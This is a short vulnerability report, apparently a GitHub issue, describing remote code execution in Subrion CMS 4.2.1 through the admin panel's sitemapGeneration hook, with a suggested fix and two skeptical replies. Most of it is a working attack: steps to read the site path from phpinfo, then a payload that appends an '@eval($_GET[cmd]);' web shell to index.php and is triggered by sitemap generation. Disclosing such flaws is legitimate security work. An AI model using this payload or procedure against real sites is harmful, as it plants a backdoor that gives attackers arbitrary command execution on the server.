There is a RCE vulnerability

[RuntimeBroker]

There is a remote command execution vulnerability

Affected version

• subrion 4.2.1 lates

login address

http://127.0.0.1/panel

Find PHP info in the System module

Get the absolute path to the website in phpinfo information

_SERVER["DOCUMENT_ROOT"]

Attack

1. Select the Hooks field in the System module

2. Edit sitemapGeneration in Hooks and save

   Get absolute path from PHPinfo above

   _SERVER["DOCUMENT_ROOT"]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/

   At this point we can write webshell into the website’s homepage file index.php

   payload

   fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);');
   

3. At this point, we can click the Generate Sitemap function to trigger code execution

The site generation function is to first write a file, and then perform a syntax check on the written PHP code. If the check passes, the code execution will be triggered.

eval($hook['code']);

4. We are accessing the website homepage file index.php

Proposed changes

Filter dangerous functions and content in the content before writing the file

[blockisec]

Filter dangerous functions and content in the content before writing the file

so we should not write eval to the file anymore?

Why even search for RCE as admin, just install an extension, that is allowed by design in most CMS - e.g. Wordpress.